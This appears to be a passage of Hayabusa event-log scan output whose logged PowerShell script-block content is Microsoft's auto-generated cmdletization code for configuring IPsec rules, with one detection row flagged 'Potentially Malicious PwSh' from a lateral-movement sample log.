[Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${Platform}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode] ${Mode}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('SecIn')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy] ${InboundSecurity}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('SecOut')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy] ${OutboundSecurity}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule] ${KeyModule}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${AllowWatchKey}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${AllowSetKey}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalTunnelEndpoint}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemoteTunnelEndpoint}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${RequireAuthorization}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${User}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Machine}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Protocol}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalPort}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemotePort}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [WildcardPattern[]] ${InterfaceAlias}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType] ${InterfaceType}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'En",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.081 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,abled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Mode')) { [object]$__cmdletization_value = ${Mode} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Mode'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Mode'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InboundSecurity')) { [object]$__cmdletization_value = ${InboundSecurity} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('OutboundSecurity')) { [object]$__cmdletization_value = ${OutboundSecurity} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'OutboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'OutboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet')) { [object]$__cmdletization_value = ${QuickModeCryptoSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'QuickModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'QuickModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase1AuthSet')) { [object]$__cmdletization_value = ${Phase1AuthSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase2AuthSet')) { [object]$__cmdletization_value = ${Phase2AuthSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase2AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase2AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('KeyModule')) { [object]$__cmdletization_value = ${KeyModule} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'KeyModule'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'KeyModule'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowWatchKey')) { [object]$__cmdletization_value = ${AllowWatchKey} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowWatchKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowWatchKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowSetKey')) { [object]$__cmdletization_value = ${AllowSetKey} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowSetKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowSetKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalTunnelEndpoint')) { [object]$__cmdletization_value = ${LocalTunnelEndpoint} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteTunnelEndpoint')) { [object]$__cmdletization_value = ${RemoteTunnelEndpoint} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname')) { [object]$__cmdletization_value = ${RemoteTunnelHostname} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpointDNSName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpointDNSName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('ForwardPathLifetime')) { [object]$__cmdletization_value = ${ForwardPathLifetime} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxReturnPathLifetimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxReturnPathLifetimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass')) { [object]$__cmdletization_value = ${EncryptedTunnelBypass} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'BypassTunnelIfEncrypted'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'BypassTunnelIfEncrypted'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RequireAuthorization')) { [object]$__cmdletization_value = ${RequireAuthorization} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RequireAuthorization'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RequireAuthorization'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('User')) { [object]$__cmdletization_value = ${User} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Users'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Users'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Machine')) { [object]$__cmdletization_value = ${Machine} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Machines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Machines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) 